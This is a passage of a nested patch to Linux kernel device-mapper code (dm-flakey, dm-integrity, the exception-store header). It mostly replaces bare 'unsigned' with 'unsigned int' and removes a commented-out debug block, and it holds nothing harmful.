+ 				      char **error);
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store);
+ void dm_exception_store_destroy(struct dm_exception_store *store);
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 335684a1aeaa5..7efbdb42cf3b4 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -26,12 +26,12 @@ struct flakey_c {
+ 	struct dm_dev *dev;
+ 	unsigned long start_time;
+ 	sector_t start;
+-	unsigned up_interval;
+-	unsigned down_interval;
++	unsigned int up_interval;
++	unsigned int down_interval;
+ 	unsigned long flags;
+-	unsigned corrupt_bio_byte;
+-	unsigned corrupt_bio_rw;
+-	unsigned corrupt_bio_value;
++	unsigned int corrupt_bio_byte;
++	unsigned int corrupt_bio_rw;
++	unsigned int corrupt_bio_value;
+ 	blk_opf_t corrupt_bio_flags;
+ };
+ 
+@@ -48,7 +48,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			  struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -148,7 +148,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			BUILD_BUG_ON(sizeof(fc->corrupt_bio_flags) !=
+ 				     sizeof(unsigned int));
+ 			r = dm_read_arg(_args + 3, as,
+-				(__force unsigned *)&fc->corrupt_bio_flags,
++				(__force unsigned int *)&fc->corrupt_bio_flags,
+ 				&ti->error);
+ 			if (r)
+ 				return r;
+@@ -324,7 +324,7 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct flakey_c *fc = ti->private;
+-	unsigned elapsed;
++	unsigned int elapsed;
+ 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
+ 	pb->bio_submitted = false;
+ 
+@@ -417,11 +417,11 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ }
+ 
+ static void flakey_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct flakey_c *fc = ti->private;
+-	unsigned drop_writes, error_writes;
++	unsigned int drop_writes, error_writes;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 1388ee35571e0..53f9f765df9fd 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -157,13 +157,13 @@ struct alg_spec {
+ 	char *alg_string;
+ 	char *key_string;
+ 	__u8 *key;
+-	unsigned key_size;
++	unsigned int key_size;
+ };
+ 
+ struct dm_integrity_c {
+ 	struct dm_dev *dev;
+ 	struct dm_dev *meta_dev;
+-	unsigned tag_size;
++	unsigned int tag_size;
+ 	__s8 log2_tag_size;
+ 	sector_t start;
+ 	mempool_t journal_io_mempool;
+@@ -171,8 +171,8 @@ struct dm_integrity_c {
+ 	struct dm_bufio_client *bufio;
+ 	struct workqueue_struct *metadata_wq;
+ 	struct superblock *sb;
+-	unsigned journal_pages;
+-	unsigned n_bitmap_blocks;
++	unsigned int journal_pages;
++	unsigned int n_bitmap_blocks;
+ 
+ 	struct page_list *journal;
+ 	struct page_list *journal_io;
+@@ -180,7 +180,7 @@ struct dm_integrity_c {
+ 	struct page_list *recalc_bitmap;
+ 	struct page_list *may_write_bitmap;
+ 	struct bitmap_block_status *bbs;
+-	unsigned bitmap_flush_interval;
++	unsigned int bitmap_flush_interval;
+ 	int synchronous_mode;
+ 	struct bio_list synchronous_bios;
+ 	struct delayed_work bitmap_flush_work;
+@@ -201,12 +201,12 @@ struct dm_integrity_c {
+ 	unsigned char journal_entries_per_sector;
+ 	unsigned char journal_section_entries;
+ 	unsigned short journal_section_sectors;
+-	unsigned journal_sections;
+-	unsigned journal_entries;
++	unsigned int journal_sections;
++	unsigned int journal_entries;
+ 	sector_t data_device_sectors;
+ 	sector_t meta_device_sectors;
+-	unsigned initial_sectors;
+-	unsigned metadata_run;
++	unsigned int initial_sectors;
++	unsigned int metadata_run;
+ 	__s8 log2_metadata_run;
+ 	__u8 log2_buffer_sectors;
+ 	__u8 sectors_per_block;
+@@ -230,17 +230,17 @@ struct dm_integrity_c {
+ 	unsigned char commit_seq;
+ 	commit_id_t commit_ids[N_COMMIT_IDS];
+ 
+-	unsigned committed_section;
+-	unsigned n_committed_sections;
++	unsigned int committed_section;
++	unsigned int n_committed_sections;
+ 
+-	unsigned uncommitted_section;
+-	unsigned n_uncommitted_sections;
++	unsigned int uncommitted_section;
++	unsigned int n_uncommitted_sections;
+ 
+-	unsigned free_section;
++	unsigned int free_section;
+ 	unsigned char free_section_entry;
+-	unsigned free_sectors;
++	unsigned int free_sectors;
+ 
+-	unsigned free_sectors_threshold;
++	unsigned int free_sectors_threshold;
+ 
+ 	struct workqueue_struct *commit_wq;
+ 	struct work_struct commit_work;
+@@ -257,7 +257,7 @@ struct dm_integrity_c {
+ 
+ 	unsigned long autocommit_jiffies;
+ 	struct timer_list autocommit_timer;
+-	unsigned autocommit_msec;
++	unsigned int autocommit_msec;
+ 
+ 	wait_queue_head_t copy_to_journal_wait;
+ 
+@@ -305,7 +305,7 @@ struct dm_integrity_io {
+ 	struct dm_integrity_range range;
+ 
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 
+ 	atomic_t in_flight;
+ 	blk_status_t bi_status;
+@@ -329,7 +329,7 @@ struct journal_io {
+ struct bitmap_block_status {
+ 	struct work_struct work;
+ 	struct dm_integrity_c *ic;
+-	unsigned idx;
++	unsigned int idx;
+ 	unsigned long *bitmap;
+ 	struct bio_list bio_queue;
+ 	spinlock_t bio_queue_lock;
+@@ -410,8 +410,8 @@ static bool dm_integrity_disable_recalculate(struct dm_integrity_c *ic)
+ 	return false;
+ }
+ 
+-static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned i,
+-					  unsigned j, unsigned char seq)
++static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned int i,
++					  unsigned int j, unsigned char seq)
+ {
+ 	/*
+ 	 * Xor the number with section and sector, so that if a piece of
+@@ -426,7 +426,7 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 	if (!ic->meta_dev) {
+ 		__u8 log2_interleave_sectors = ic->sb->log2_interleave_sectors;
+ 		*area = data_sector >> log2_interleave_sectors;
+-		*offset = (unsigned)data_sector & ((1U << log2_interleave_sectors) - 1);
++		*offset = (unsigned int)data_sector & ((1U << log2_interleave_sectors) - 1);
+ 	} else {
+ 		*area = 0;
+ 		*offset = data_sector;
+@@ -435,15 +435,15 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 
+ #define sector_to_block(ic, n)						\
+ do {									\
+-	BUG_ON((n) & (unsigned)((ic)->sectors_per_block - 1));		\
++	BUG_ON((n) & (unsigned int)((ic)->sectors_per_block - 1));		\
+ 	(n) >>= (ic)->sb->log2_sectors_per_block;			\
+ } while (0)
+ 
+ static __u64 get_metadata_sector_and_offset(struct dm_integrity_c *ic, sector_t area,
+-					    sector_t offset, unsigned *metadata_offset)
++					    sector_t offset, unsigned int *metadata_offset)
+ {
+ 	__u64 ms;
+-	unsigned mo;
++	unsigned int mo;
+ 
+ 	ms = area << ic->sb->log2_interleave_sectors;
+ 	if (likely(ic->log2_metadata_run >= 0))
+@@ -484,7 +484,7 @@ static sector_t get_data_sector(struct dm_integrity_c *ic, sector_t area, sector
+ 	return result;
+ }
+ 
+-static void wraparound_section(struct dm_integrity_c *ic, unsigned *sec_ptr)
++static void wraparound_section(struct dm_integrity_c *ic, unsigned int *sec_ptr)
+ {
+ 	if (unlikely(*sec_ptr >= ic->journal_sections))
+ 		*sec_ptr -= ic->journal_sections;
+@@ -508,7 +508,7 @@ static int sb_mac(struct dm_integrity_c *ic, bool wr)
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned size = crypto_shash_digestsize(ic->journal_mac);
++	unsigned int size = crypto_shash_digestsize(ic->journal_mac);
+ 
+ 	if (sizeof(struct superblock) + size > 1 << SECTOR_SHIFT) {
+ 		dm_integrity_io_error(ic, "digest is too long", -EINVAL);
+@@ -704,8 +704,8 @@ repeat:
+ 
+ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst, struct page_list *src)
+ {
+-	unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+-	unsigned i;
++	unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++	unsigned int i;
+ 
+ 	for (i = 0; i < n_bitmap_pages; i++) {
+ 		unsigned long *dst_data = lowmem_page_address(dst[i].page);
+@@ -716,18 +716,18 @@ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst,
+ 
+ static struct bitmap_block_status *sector_to_bitmap_block(struct dm_integrity_c *ic, sector_t sector)
+ {
+-	unsigned bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
+-	unsigned bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
++	unsigned int bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
++	unsigned int bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
+ 
+ 	BUG_ON(bitmap_block >= ic->n_bitmap_blocks);
+ 	return &ic->bbs[bitmap_block];
+ }
+ 
+-static void access_journal_check(struct dm_integrity_c *ic, unsigned section, unsigned offset,
++static void access_journal_check(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
+ 				 bool e, const char *function)
+ {
+ #if defined(CONFIG_DM_DEBUG) || defined(INTERNAL_VERIFY)
+-	unsigned limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
++	unsigned int limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
+ 
+ 	if (unlikely(section >= ic->journal_sections) ||
+ 	    unlikely(offset >= limit)) {
+@@ -738,10 +738,10 @@ static void access_journal_check(struct dm_integrity_c *ic, unsigned section, un
+ #endif
+ }
+ 
+-static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			       unsigned *pl_index, unsigned *pl_offset)
++static void page_list_location(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			       unsigned int *pl_index, unsigned int *pl_offset)
+ {
+-	unsigned sector;
++	unsigned int sector;
+ 
+ 	access_journal_check(ic, section, offset, false, "page_list_location");
+ 
+@@ -752,9 +752,9 @@ static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsi
+ }
+ 
+ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct page_list *pl,
+-					       unsigned section, unsigned offset, unsigned *n_sectors)
++					       unsigned int section, unsigned int offset, unsigned int *n_sectors)
+ {
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	char *va;
+ 
+ 	page_list_location(ic, section, offset, &pl_index, &pl_offset);
+@@ -767,14 +767,14 @@ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct
+ 	return (struct journal_sector *)(va + pl_offset);
+ }
+ 
+-static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset)
++static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset)
+ {
+ 	return access_page_list(ic, ic->journal, section, offset, NULL);
+ }
+ 
+-static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+-	unsigned rel_sector, offset;
++	unsigned int rel_sector, offset;
+ 	struct journal_sector *js;
+ 
+ 	access_journal_check(ic, section, n, true, "access_journal_entry");
+@@ -786,7 +786,7 @@ static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, uns
+ 	return (struct journal_entry *)((char *)js + offset * ic->journal_entry_size);
+ }
+ 
+-static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+ 	n <<= ic->sb->log2_sectors_per_block;
+ 
+@@ -797,11 +797,11 @@ static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, uns
+ 	return access_journal(ic, section, n);
+ }
+ 
+-static void section_mac(struct dm_integrity_c *ic, unsigned section, __u8 result[JOURNAL_MAC_SIZE])
++static void section_mac(struct dm_integrity_c *ic, unsigned int section, __u8 result[JOURNAL_MAC_SIZE])
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned j, size;
++	unsigned int j, size;
+ 
+ 	desc->tfm = ic->journal_mac;
+ 
+@@ -866,10 +866,10 @@ err:
+ 	memset(result, 0, JOURNAL_MAC_SIZE);
+ }
+ 
+-static void rw_section_mac(struct dm_integrity_c *ic, unsigned section, bool wr)
++static void rw_section_mac(struct dm_integrity_c *ic, unsigned int section, bool wr)
+ {
+ 	__u8 result[JOURNAL_MAC_SIZE];
+-	unsigned j;
++	unsigned int j;
+ 
+ 	if (!ic->journal_mac)
+ 		return;
+@@ -898,12 +898,12 @@ static void complete_journal_op(void *context)
+ 		complete(&comp->comp);
+ }
+ 
+-static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			unsigned n_sections, struct journal_completion *comp)
++static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct async_submit_ctl submit;
+ 	size_t n_bytes = (size_t)(n_sections * ic->journal_section_sectors) << SECTOR_SHIFT;
+-	unsigned pl_index, pl_offset, section_index;
++	unsigned int pl_index, pl_offset, section_index;
+ 	struct page_list *source_pl, *target_pl;
+ 
+ 	if (likely(encrypt)) {
+@@ -928,7 +928,7 @@ static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sectio
+ 		struct page *dst_page;
+ 
+ 		while (unlikely(pl_index == section_index)) {
+-			unsigned dummy;
++			unsigned int dummy;
+ 			if (likely(encrypt))
+ 				rw_section_mac(ic, section, true);
+ 			section++;
+@@ -990,8 +990,8 @@ static bool do_crypt(bool encrypt, struct skcipher_request *req, struct journal_
+ 	return false;
+ }
+ 
+-static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			  unsigned n_sections, struct journal_completion *comp)
++static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			  unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct scatterlist **source_sg;
+ 	struct scatterlist **target_sg;
+@@ -1008,7 +1008,7 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 
+ 	do {
+ 		struct skcipher_request *req;
+-		unsigned ivsize;
++		unsigned int ivsize;
+ 		char *iv;
+ 
+ 		if (likely(encrypt))
+@@ -1034,8 +1034,8 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 	complete_journal_op(comp);
+ }
+ 
+-static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			    unsigned n_sections, struct journal_completion *comp)
++static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			    unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	if (ic->journal_xor)
+ 		return xor_journal(ic, encrypt, section, n_sections, comp);
+@@ -1052,12 +1052,12 @@ static void complete_journal_io(unsigned long error, void *context)
+ }
+ 
+ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+-			       unsigned sector, unsigned n_sectors,
++			       unsigned int sector, unsigned int n_sectors,
+ 			       struct journal_completion *comp)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	int r;
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+@@ -1099,10 +1099,10 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ }
+ 
+ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+-		       unsigned section, unsigned n_sections,
++		       unsigned int section, unsigned int n_sections,
+ 		       struct journal_completion *comp)
+ {
+-	unsigned sector, n_sectors;
++	unsigned int sector, n_sectors;
+ 
+ 	sector = section * ic->journal_section_sectors;
+ 	n_sectors = n_sections * ic->journal_section_sectors;
+@@ -1110,12 +1110,12 @@ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	rw_journal_sectors(ic, opf, sector, n_sectors, comp);
+ }
+ 
+-static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsigned commit_sections)
++static void write_journal(struct dm_integrity_c *ic, unsigned int commit_start, unsigned int commit_sections)
+ {
+ 	struct journal_completion io_comp;
+ 	struct journal_completion crypt_comp_1;
+ 	struct journal_completion crypt_comp_2;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	io_comp.ic = ic;
+ 	init_completion(&io_comp.comp);
+@@ -1135,7 +1135,7 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 		rw_journal(ic, REQ_OP_WRITE | REQ_FUA | REQ_SYNC, commit_start,
+ 			   commit_sections, &io_comp);
+ 	} else {
+-		unsigned to_end;
++		unsigned int to_end;
+ 		io_comp.in_flight = (atomic_t)ATOMIC_INIT(2);
+ 		to_end = ic->journal_sections - commit_start;
+ 		if (ic->journal_io) {
+@@ -1172,15 +1172,15 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 	wait_for_completion_io(&io_comp.comp);
+ }
+ 
+-static void copy_from_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			      unsigned n_sectors, sector_t target, io_notify_fn fn, void *data)
++static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			      unsigned int n_sectors, sector_t target, io_notify_fn fn, void *data)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+ 	int r;
+-	unsigned sector, pl_index, pl_offset;
++	unsigned int sector, pl_index, pl_offset;
+ 
+-	BUG_ON((target | n_sectors | offset) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((target | n_sectors | offset) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+ 		fn(-1UL, data);
+@@ -1221,7 +1221,7 @@ static bool add_new_range(struct dm_integrity_c *ic, struct dm_integrity_range *
+ 	struct rb_node **n = &ic->in_progress.rb_node;
+ 	struct rb_node *parent;
+ 
+-	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (likely(check_waiting)) {
+ 		struct dm_integrity_range *range;
+@@ -1339,10 +1339,10 @@ static void remove_journal_node(struct dm_integrity_c *ic, struct journal_node *
+ 
+ #define NOT_FOUND	(-1U)
+ 
+-static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
++static unsigned int find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
+ {
+ 	struct rb_node *n = ic->journal_tree_root.rb_node;
+-	unsigned found = NOT_FOUND;
++	unsigned int found = NOT_FOUND;
+ 	*next_sector = (sector_t)-1;
+ 	while (n) {
+ 		struct journal_node *j = container_of(n, struct journal_node, node);
+@@ -1360,7 +1360,7 @@ static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, se
+ 	return found;
+ }
+ 
+-static bool test_journal_node(struct dm_integrity_c *ic, unsigned pos, sector_t sector)
++static bool test_journal_node(struct dm_integrity_c *ic, unsigned int pos, sector_t sector)
+ {
+ 	struct journal_node *node, *next_node;
+ 	struct rb_node *next;
+@@ -1385,7 +1385,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ {
+ 	struct rb_node *next;
+ 	struct journal_node *next_node;
+-	unsigned next_section;
++	unsigned int next_section;
+ 
+ 	BUG_ON(RB_EMPTY_NODE(&node->node));
+ 
+@@ -1398,7 +1398,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ 	if (next_node->sector != node->sector)
+ 		return false;
+ 
+-	next_section = (unsigned)(next_node - ic->journal_tree) / ic->journal_section_entries;
++	next_section = (unsigned int)(next_node - ic->journal_tree) / ic->journal_section_entries;
+ 	if (next_section >= ic->committed_section &&
+ 	    next_section < ic->committed_section + ic->n_committed_sections)
+ 		return true;
+@@ -1413,17 +1413,17 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ #define TAG_CMP		2
+ 
+ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, sector_t *metadata_block,
+-			       unsigned *metadata_offset, unsigned total_size, int op)
++			       unsigned int *metadata_offset, unsigned int total_size, int op)
+ {
+ #define MAY_BE_FILLER		1
+ #define MAY_BE_HASH		2
+-	unsigned hash_offset = 0;
+-	unsigned may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
++	unsigned int hash_offset = 0;
++	unsigned int may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
+ 
+ 	do {
+ 		unsigned char *data, *dp;
+ 		struct dm_buffer *b;
+-		unsigned to_copy;
++		unsigned int to_copy;
+ 		int r;
+ 
+ 		r = dm_integrity_failed(ic);
+@@ -1453,7 +1453,7 @@ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, se
+ 						goto thorough_test;
+ 				}
+ 			} else {
+-				unsigned i, ts;
++				unsigned int i, ts;
+ thorough_test:
+ 				ts = total_size;
+ 
+@@ -1652,7 +1652,7 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	__le64 sector_le = cpu_to_le64(sector);
+ 	SHASH_DESC_ON_STACK(req, ic->internal_hash);
+ 	int r;
+-	unsigned digest_size;
++	unsigned int digest_size;
+ 
+ 	req->tfm = ic->internal_hash;
+ 
+@@ -1709,13 +1709,13 @@ static void integrity_metadata(struct work_struct *w)
+ 	if (ic->internal_hash) {
+ 		struct bvec_iter iter;
+ 		struct bio_vec bv;
+-		unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++		unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 		struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 		char *checksums;
+-		unsigned extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
++		unsigned int extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
+ 		char checksums_onstack[max((size_t)HASH_MAX_DIGESTSIZE, MAX_TAG_SIZE)];
+ 		sector_t sector;
+-		unsigned sectors_to_process;
++		unsigned int sectors_to_process;
+ 
+ 		if (unlikely(ic->mode == 'R'))
+ 			goto skip_io;
+@@ -1735,14 +1735,13 @@ static void integrity_metadata(struct work_struct *w)
+ 		}
+ 
+ 		if (unlikely(dio->op == REQ_OP_DISCARD)) {
+-			sector_t bi_sector = dio->bio_details.bi_iter.bi_sector;
+-			unsigned bi_size = dio->bio_details.bi_iter.bi_size;
+-			unsigned max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
+-			unsigned max_blocks = max_size / ic->tag_size;
++			unsigned int bi_size = dio->bio_details.bi_iter.bi_size;
++			unsigned int max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
++			unsigned int max_blocks = max_size / ic->tag_size;
+ 			memset(checksums, DISCARD_FILLER, max_size);
+ 
+ 			while (bi_size) {
+-				unsigned this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
++				unsigned int this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+ 				this_step_blocks = min(this_step_blocks, max_blocks);
+ 				r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 							this_step_blocks * ic->tag_size, TAG_WRITE);
+@@ -1752,13 +1751,7 @@ static void integrity_metadata(struct work_struct *w)
+ 					goto error;
+ 				}
+ 
+-				/*if (bi_size < this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block)) {
+-					printk("BUGG: bi_sector: %llx, bi_size: %u\n", bi_sector, bi_size);
+-					printk("BUGG: this_step_blocks: %u\n", this_step_blocks);
+-					BUG();
+-				}*/
+ 				bi_size -= this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+-				bi_sector += this_step_blocks << ic->sb->log2_sectors_per_block;
+ 			}
+ 
+ 			if (likely(checksums != checksums_onstack))
+@@ -1770,7 +1763,7 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+-			unsigned pos;
++			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+@@ -1823,13 +1816,13 @@ again:
+ 		if (bip) {
+ 			struct bio_vec biv;
+ 			struct bvec_iter iter;
+-			unsigned data_to_process = dio->range.n_sectors;
++			unsigned int data_to_process = dio->range.n_sectors;
+ 			sector_to_block(ic, data_to_process);
+ 			data_to_process *= ic->tag_size;
+ 
+ 			bip_for_each_vec(biv, bip, iter) {
+ 				unsigned char *tag;
+-				unsigned this_len;
++				unsigned int this_len;
+ 
+ 				BUG_ON(PageHighMem(biv.bv_page));
+ 				tag = bvec_virt(&biv);
+@@ -1867,7 +1860,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	if (unlikely(dio->op == REQ_OP_DISCARD)) {
+ 		if (ti->max_io_len) {
+ 			sector_t sec = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-			unsigned log2_max_io_len = __fls(ti->max_io_len);
++			unsigned int log2_max_io_len = __fls(ti->max_io_len);
+ 			sector_t start_boundary = sec >> log2_max_io_len;
+ 			sector_t end_boundary = (sec + bio_sectors(bio) - 1) >> log2_max_io_len;
+ 			if (start_boundary < end_boundary) {
+@@ -1897,7 +1890,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 		      ic->provided_data_sectors);
+ 		return DM_MAPIO_KILL;
+ 	}
+-	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned)(ic->sectors_per_block - 1))) {
++	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned int)(ic->sectors_per_block - 1))) {
+ 		DMERR("Bio not aligned on %u sectors: 0x%llx, 0x%x",
+ 		      ic->sectors_per_block,
+ 		      dio->range.logical_sector, bio_sectors(bio));
+@@ -1919,7 +1912,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	bip = bio_integrity(bio);
+ 	if (!ic->internal_hash) {
+ 		if (bip) {
+-			unsigned wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
++			unsigned int wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
+ 			if (ic->log2_tag_size >= 0)
+ 				wanted_tag_size <<= ic->log2_tag_size;
+ 			else
+@@ -1949,11 +1942,11 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static bool __journal_read_write(struct dm_integrity_io *dio, struct bio *bio,
+-				 unsigned journal_section, unsigned journal_entry)
++				 unsigned int journal_section, unsigned int journal_entry)
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	sector_t logical_sector;
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 
+ 	logical_sector = dio->range.logical_sector;
+ 	n_sectors = dio->range.n_sectors;
+@@ -1976,7 +1969,7 @@ retry_kmap:
+ 			if (unlikely(dio->op == REQ_OP_READ)) {
+ 				struct journal_sector *js;
+ 				char *mem_ptr;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				if (unlikely(journal_entry_is_inprogress(je))) {
+ 					flush_dcache_page(bv.bv_page);
+@@ -2013,12 +2006,12 @@ retry_kmap:
+ 
+ 			if (!ic->internal_hash) {
+ 				struct bio_integrity_payload *bip = bio_integrity(bio);
+-				unsigned tag_todo = ic->tag_size;
++				unsigned int tag_todo = ic->tag_size;
+ 				char *tag_ptr = journal_entry_tag(ic, je);
+ 
+ 				if (bip) do {
+ 					struct bio_vec biv = bvec_iter_bvec(bip->bip_vec, bip->bip_iter);
+-					unsigned tag_now = min(biv.bv_len, tag_todo);
++					unsigned int tag_now = min(biv.bv_len, tag_todo);
+ 					char *tag_addr;
+ 					BUG_ON(PageHighMem(biv.bv_page));
+ 					tag_addr = bvec_virt(&biv);
+@@ -2037,7 +2030,7 @@ retry_kmap:
+ 
+ 			if (likely(dio->op == REQ_OP_WRITE)) {
+ 				struct journal_sector *js;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				js = access_journal_data(ic, journal_section, journal_entry);
+ 				memcpy(js, mem + bv.bv_offset, ic->sectors_per_block << SECTOR_SHIFT);
+@@ -2048,7 +2041,7 @@ retry_kmap:
+ 				} while (++s < ic->sectors_per_block);
+ 
+ 				if (ic->internal_hash) {
